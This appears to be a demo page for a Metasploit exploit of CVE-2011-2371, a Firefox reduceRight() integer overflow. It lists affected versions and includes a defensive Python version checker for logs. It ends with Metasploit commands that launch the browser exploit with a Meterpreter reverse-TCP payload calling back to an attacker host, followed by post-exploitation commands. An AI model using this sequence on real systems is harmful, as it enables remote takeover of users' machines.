CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Chris Rohlf & Yan Ivnitskiy on 2011-06-13
Public release of the vulnerability on 2011-06-21
Metasploit PoC provided on 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index to be used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compared to a typical browser exploit) in order to gain control of the machine.
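
As an added example (not part of the original post or of the Metasploit module), the following Python checks a product/version pair, or the product tokens found in a User-Agent string, against the affected ranges listed above; the version table comes from this page and the User-Agent samples are constructed.

```python
import re

# Fixed versions as stated on this page (MFSA-2011-22). The branch a fix belongs to
# is its version minus the last component, e.g. 3.6.18 fixes the 3.6 branch.
FIXED_IN = {
    "firefox": [(3, 6, 18), (4, 0, 1)],
    "thunderbird": [(3, 1, 11)],
    "seamonkey": [(2, 2)],
}

def parse_version(text):
    """'3.6.16' -> (3, 6, 16); tolerant of suffixes such as '3.6.16pre'."""
    nums = re.findall(r"\d+", text)
    if not nums:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(n) for n in nums)

def is_affected(product, version):
    """True when the product/version falls below the fix for its own branch."""
    fixes = FIXED_IN.get(product.lower())
    if fixes is None:
        return False  # product not covered by this advisory
    v = parse_version(version)
    if v >= max(fixes):
        return False  # newer than every fix listed
    # A version already carrying the fix for its own branch (e.g. 3.6.18) is clean.
    return not any(v[:len(f) - 1] == f[:-1] and v >= f for f in fixes)

UA_PRODUCT = re.compile(r"\b(Firefox|Thunderbird|SeaMonkey)/(\d+(?:\.\d+)*)")

def affected_from_user_agent(ua):
    """Return the (product, version) pairs in a User-Agent string that are affected."""
    return [(p, ver) for p, ver in UA_PRODUCT.findall(ua) if is_affected(p, ver)]

# Constructed sample User-Agent strings (not captured traffic) for a quick check.
SAMPLE_UAS = [
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16",
    "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.17) Gecko/20110414 SeaMonkey/2.0.14",
]

if __name__ == "__main__":
    for ua in SAMPLE_UAS:
        print(affected_from_user_agent(ua) or "not affected", "<-", ua)
```

Run it over proxy or web-server logs to list clients that still need the update; the version table is easy to extend if a later advisory changes the fixed builds.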

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo